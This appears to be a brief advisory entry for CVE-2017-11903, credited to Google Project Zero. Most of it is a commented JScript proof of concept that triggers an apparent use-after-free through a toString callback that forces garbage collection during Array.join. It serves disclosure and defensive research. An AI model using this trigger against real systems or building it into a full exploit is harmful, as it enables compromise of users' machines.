CVE-2017-11903

  • Report: Oct 2017
  • Fix: Dec 2017
  • Credit: ifratric of Google Project Zero

PoC

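<script language="Jscript.Encode">

// Fill an array with 100 objects.
var vars = new Array(100);
for(var i=0;i<100;i++) vars[i] = {};

// Runs as the toString callback while join() is walking the array:
// overwrites the slot that held the current element, then forces a
// garbage collection before returning a fresh object.
function f() {
  vars[1] = 1;
  CollectGarbage();
  return {};
}

vars[1].toString = f;
// join() converts each element to a string, which calls f for vars[1].
Array.prototype.join.call(vars);

</script>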

Reference